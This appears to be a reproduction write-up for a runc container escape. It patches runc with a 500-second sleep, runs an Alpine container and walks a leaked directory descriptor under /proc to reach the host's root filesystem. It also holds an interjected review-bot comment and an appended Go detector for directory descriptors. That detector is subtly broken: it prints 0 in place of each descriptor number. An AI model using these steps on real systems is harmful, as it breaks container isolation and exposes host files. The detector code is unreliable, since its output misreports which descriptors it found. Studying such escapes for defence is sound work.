The reproduction steps are described here.
$ cd $GOPATH/src/github.com
$ git clone https://github.com/opencontainers/runc opencontainers/runc
$ cd opencontainers/runc
$ git fetch origin 2cc5a91249ab3b362f1235da955d112017979d34
$ git checkout 2cc5a91249ab3b362f1235da955d112017979d34
$ vi $GOPATH/src/github.com/opencontainers/runc/libcontainer/setns_init_linux.go
Modify the two lines marked `+` below.
package libcontainer
import (
"fmt"
"os"
"github.com/opencontainers/runc/libcontainer/apparmor"
"github.com/opencontainers/runc/libcontainer/keys"
"github.com/opencontainers/runc/libcontainer/label"
"github.com/opencontainers/runc/libcontainer/seccomp"
"github.com/opencontainers/runc/libcontainer/system"
+ "time"
)
if err := label.SetProcessLabel(l.config.ProcessLabel); err != nil {
return err
}
+ time.Sleep(500 * time.Second)
return system.Execv(l.config.Args[0], l.config.Args[0:], os.Environ())
}
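Review bot: the `time.Sleep(500 * time.Second)` added between `label.SetProcessLabel` and `system.Execv` carries no comment marking it as a reproduction-only delay; add one above the call, and keep this build out of any location where it could be picked up as the system runc, because every process started through this init path would stall for 500 seconds before its exec.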
Create the container.
sh1$ docker pull alpine
sh1$ docker create --name alpine alpine
sh1$ mkdir rootfs
sh1$ docker export alpine | tar xvfC - rootfs/
sh1$ runc spec
sh1$ runc run ctr
Open a new terminal and create a process inside the container.
sh2$ runc exec ctr sh
This blocks for about 500 seconds. Go back to the first terminal.
sh1$ ps aux
sh1$ ls /proc/18/fd -la
sh1$ ls -la /proc/18/fd/4/../../..
In this way, the host's rootfs can be accessed.
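A defender-side check for the condition shown above, as an added example that is not part of the original post or of runc: it lists which descriptors of a process refer to directories, the way fd 4 of PID 18 does in the listing. The names `DirFD` and `FindDirFDs` are hypothetical, and the directory to scan is a parameter so the function can also be run on a constructed directory of symlinks.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// DirFD is one open descriptor that refers to a directory.
type DirFD struct {
	FD     string // descriptor number, as named under /proc/<pid>/fd
	Target string // where the descriptor's symlink points
}

// FindDirFDs scans fdDir (normally /proc/<pid>/fd) and returns every
// descriptor that resolves to a directory: the kind of handle that the
// "fd/4/../../.." traversal on this page starts from.
func FindDirFDs(fdDir string) ([]DirFD, error) {
	entries, err := os.ReadDir(fdDir)
	if err != nil {
		return nil, err
	}
	var found []DirFD
	for _, e := range entries {
		link := filepath.Join(fdDir, e.Name())
		info, err := os.Stat(link) // follows the symlink to the open object
		if err != nil || !info.IsDir() {
			continue // closed meanwhile, a pipe/socket, or a regular file
		}
		target, _ := os.Readlink(link)
		found = append(found, DirFD{FD: e.Name(), Target: target})
	}
	return found, nil
}

func main() {
	pid := "self" // optional argument: the PID to inspect
	if len(os.Args) > 1 {
		pid = os.Args[1]
	}
	fds, err := FindDirFDs(filepath.Join("/proc", pid, "fd"))
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, d := range fds {
		fmt.Printf("fd %d -> %s\n", 0, d.Target)
		_ = d.FD
	}
}
```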